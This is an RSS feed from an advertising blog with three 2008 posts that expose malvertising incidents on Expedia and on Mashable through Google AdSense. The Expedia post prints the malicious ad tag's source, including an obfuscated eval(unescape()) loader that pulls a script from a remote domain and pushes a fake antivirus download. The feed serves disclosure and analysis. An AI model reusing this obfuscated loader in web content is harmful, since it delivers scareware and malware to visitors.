<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Mike On Ads &#187; malvertising</title>
	<atom:link href="http://www.mikeonads.com/category/malvertising/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mikeonads.com</link>
	<description>Ramblings about online advertising, ad networks &#038; other techie randomness</description>
	<lastBuildDate>Mon, 12 Apr 2010 03:59:17 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Malvertisement on Expedia.com</title>
		<link>http://www.mikeonads.com/2008/11/23/malvertisement-on-expediacom/</link>
		<comments>http://www.mikeonads.com/2008/11/23/malvertisement-on-expediacom/#comments</comments>
		<pubDate>Sun, 23 Nov 2008 11:26:03 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[malvertising]]></category>

		<guid isPermaLink="false">http://www.mikeonads.com/?p=309</guid>
		<description><![CDATA[Kudos to Andrew Dilling who sent me the full logs of this last night.  I don&#8217;t have a contact @ Expedia but if someone does please shoot them a note.  
Screenshot:

The popup:

Antivirus 2009 Download Page:

Tamper Data:

Calls:

GET http://www.expedia.com/
GET http://www.prolinar.com/?id=200811181921042
GET http://vernariostar.com/?id=200811181921042
GET http://www.google-analytics.com/ga.js
GET http://www.google-analytics.com/__utm.gif?utmwv[...]
http://vernariostar.com/includes.js
POST http://clicksoverview.com/soft.php?aid=075675&#038;d=1&#038;product=XPA&#038;refer=dc77b3921
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675

Code of the Ad tag page:

&#60;html&#62;&#60;body style=&#34;margin:0; padding:0;&#34;&#62;
&#60;a href=&#34;http://www.rhapsody.com/?ref=26ta7&#34; target=&#34;_blank&#34;&#62;&#60;img src=&#34;http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728&#215;90_1.jpg&#34; [...]]]></description>
			<content:encoded><![CDATA[<p>Kudos to Andrew Dilling who sent me the full logs of this last night.  I don&#8217;t have a contact @ Expedia but if someone does please shoot them a note.  </p>
<p><b>Screenshot:</b><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/11/expedia_pic1.png" alt="" title="expedia_pic1" width="500" height="221" class="alignnone size-full wp-image-314" /></p>
<p><b>The popup:</b><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/11/expedia_pic2.png" alt="" title="expedia_pic2" width="488" height="285" class="alignnone size-full wp-image-315" /></p>
<p><b>Antivirus 2009 Download Page:</b><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/11/expedia_pic3.png" alt="" title="expedia_pic3" width="500" height="242" class="alignnone size-full wp-image-316" /></p>
<p><b>Tamper Data:</b><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/11/tamper_data.png" alt="" title="tamper_data" width="500" height="256" class="alignnone size-full wp-image-318" /></p>
<p><b>Calls:</b></p>
<blockquote><p>
GET http://www.expedia.com/<br />
GET http://www.prolinar.com/?id=200811181921042<br />
GET http://vernariostar.com/?id=200811181921042<br />
GET http://www.google-analytics.com/ga.js<br />
GET http://www.google-analytics.com/__utm.gif?utmwv[...]<br />
http://vernariostar.com/includes.js<br />
POST http://clicksoverview.com/soft.php?aid=075675&#038;d=1&#038;product=XPA&#038;refer=dc77b3921<br />
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675
</p></blockquote>
<p><b>Code of the Ad tag page:</b></p>
<blockquote><p>
&lt;html&gt;&lt;body style=&quot;margin:0; padding:0;&quot;&gt;<br />
&lt;a href=&quot;http://www.rhapsody.com/?ref=26ta7&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728&#215;90_1.jpg&quot; border=0&gt;&lt;/a&gt;</p>
<p>&lt;script type=&quot;text/javascript&quot;&gt;<br />
var gaJsHost = ((&quot;https:&quot; == document.location.protocol) ? &quot;https://ssl.&quot; : &quot;http://www.&quot;);<br />
document.write(unescape(&quot;%3Cscript src=&#8217;&quot; + gaJsHost + &quot;google-analytics.com/ga.js&#8217; type=&#8217;text/javascript&#8217;%3E%3C/script%3E&quot;));</p>
<p>&lt;/script&gt;<br />
&lt;script type=&quot;text/javascript&quot;&gt;<br />
var pageTracker = _gat._getTracker(&quot;UA-6195944-3&quot;);<br />
pageTracker._trackPageview();<br />
&lt;/script&gt;</p>
<p>    &lt;script&gt;<br />
var action_URL = &quot;http://clicksoverview.com/soft.php?aid=075675&amp;d=1&amp;product=XPA&amp;refer=dc77b3921&quot;;<br />
var target_URL = &quot;http://clicksoverview.com/soft.php?aid=075675&amp;d=1&amp;product=XPA&amp;refer=dc77b3921&quot;;<br />
var warn_prod = &quot;&quot;;<br />
eval(unescape(&#8217;%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B&#8217;));</p>
<p>&lt;/script&gt;</p>
<p>&lt;/body&gt;&lt;/html&gt;
</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.mikeonads.com/2008/11/23/malvertisement-on-expediacom/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Mashable/Google/Malvertising Follow-Up</title>
		<link>http://www.mikeonads.com/2008/08/20/mashablegooglemalvertising-follow-up/</link>
		<comments>http://www.mikeonads.com/2008/08/20/mashablegooglemalvertising-follow-up/#comments</comments>
		<pubDate>Wed, 20 Aug 2008 08:29:07 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malvertising]]></category>

		<guid isPermaLink="false">http://www.mikeonads.com/?p=292</guid>
		<description><![CDATA[First off &#8212; the ad is still showing.  If someone has a contact @ Mashable, it&#8217;d be good to send them a note.  
Greg Yardley thinks that this ad is not served by the Adsense network but instead by Mashable&#8217;s internal salesforce and that they are simply using Google&#8217;s new AdManager product as [...]]]></description>
			<content:encoded><![CDATA[<p>First off &#8212; <a href="http://www.mikeonads.com/2008/08/19/google-adsense-showing-malvertisements/"><b>the ad is still showing</b></a>.  If someone has a contact @ Mashable, it&#8217;d be good to send them a note.  </p>
<p><a href="http://yardley.ca/">Greg Yardley</a> thinks that this ad is not served by the Adsense network but instead by Mashable&#8217;s internal salesforce and that they are simply using Google&#8217;s new AdManager product as their adserving solution.  Digging through the tags, it&#8217;s unclear whether or not this is the case.  The actual creative is hosted on the domain &#8220;pagead2.googlesyndication.com&#8221; which has traditionally been used to host <b>Adsense</b> creatives and ad tags.  Google&#8217;s AdManager runs on a different domain &#8212; &#8220;partner.googleadservices.com&#8221; &#8212; but it is certainly possible that AdManager and AdSense share the same underlying static content delivery system.  (someone from Google care to comment?) </p>
<p>This is an excellent example of the fact that URLs generally don&#8217;t provide enough information to identify who is delivering the actual advertisement on the page.  In this Mashable/Google page, it is unclear &#8212; it could be Mashable&#8217;s internal salesforce selling the ad &#8212; or there could be some server-side integration between AdManager and Adsense and Adsense is responsible for serving this actual creative.  Right Media suffered from many of the same problems &#8212; people would always yell at the Right Media Ad-Network whenever a creative hosted at content.yieldmanager.com was causing problems, even though that single domain was shared across 50+ networks.</p>
<p>The solution that we came up with @ RM was to start using DNS CNAME aliases when returning any and all content.  A <a href="http://en.wikipedia.org/wiki/Domain_Name_System">CNAME</a> is a simple DNS record that simply says &#8212; &#8220;this domain name is an alias for this other domain name&#8221;.  So for example, the domain &#8220;content.cpxinteractive.com&#8221; is an alias for &#8220;content.yieldmanager.com&#8221;.  This way, if CPX was responsible for serving a bad ad the offending URL would be &#8220;content.cpxinteractive.com/ad.jpg&#8221; and not &#8220;ad.yieldmanager.com/ad.jpg&#8221;.  CNAMEs allow central serving systems (eg, AdManager) to both hand out tags and return creative content tagged with an owner while still maintaining the same internal systems.  </p>
]]></content:encoded>
			<wfw:commentRss>http://www.mikeonads.com/2008/08/20/mashablegooglemalvertising-follow-up/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Google Adsense showing Malvertisements</title>
		<link>http://www.mikeonads.com/2008/08/19/google-adsense-showing-malvertisements/</link>
		<comments>http://www.mikeonads.com/2008/08/19/google-adsense-showing-malvertisements/#comments</comments>
		<pubDate>Tue, 19 Aug 2008 05:54:38 +0000</pubDate>
		<dc:creator>Mike</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[errorsafe]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[malvertising]]></category>

		<guid isPermaLink="false">http://www.mikeonads.com/?p=287</guid>
		<description><![CDATA[Matt Cannon sent this one over to me yesterday afternoon.  He saw Google showing this lovely ad for MediaMan on mashable.com at about 1pm EST.  MediaMan has been identified a long time ago as a malvertisement so it&#8217;s a surprise to see them popping up on the Adsense network.  Details are below. [...]]]></description>
			<content:encoded><![CDATA[<p>Matt Cannon sent this one over to me yesterday afternoon.  He saw Google showing this lovely ad for MediaMan on mashable.com at about 1pm EST.  MediaMan has been identified a <a href="http://msmvps.com/blogs/spywaresucks/archive/2008/04/01/1564553.aspx">long time ago</a> as a malvertisement so it&#8217;s a surprise to see them popping up on the Adsense network.  Details are below.  Now I&#8217;m not posting this to shame Google (I&#8217;m sure their content team has already pulled this ad) &#8212; I&#8217;m posting this more as a call to action.  It&#8217;s time that we start grouping together as an industry to help stop this.  More thoughts coming on that shortly.</p>
<p>Screengrab of ad on Mashable:<br />
<center><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/08/imedia.jpg" alt="" title="imedia" width="500" class="aligncenter size-full wp-image-288" /><br />
</center></p>
<p>Source of the ad (<b>warning I would not open this if I were you</b>):<br />
http://pagead2.googlesyndication.com/pagead/imgad?id=CLK8lreVvKyciwEQ2AUYWjIIqyqX6hvFaHc</p>
<p>Screengrab of the ad:<br />
<center><br />
<img width="500" src="http://www.mikeonads.com/wp-content/uploads/2008/08/picture-3.png" alt="" /><br />
</center></p>
<p>And for the first time in a while (probably because I&#8217;m in Moscow!) I actually got the actual trigger, and got this nice popup:</p>
<p><center><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/08/picture-1.png" alt="" title="picture-1" width="400" class="alignnone size-full wp-image-290" /><br />
</center></p>
<p>and was redirected to this lovely landing page:<br />
<center><br />
<img src="http://www.mikeonads.com/wp-content/uploads/2008/08/picture-2.png" alt="" title="picture-2" width="500" height="383" class="alignnone size-full wp-image-291" title="picture-3" width="499" height="62" class="aligncenter size-full wp-image-289" /><br />
</center></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mikeonads.com/2008/08/19/google-adsense-showing-malvertisements/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>
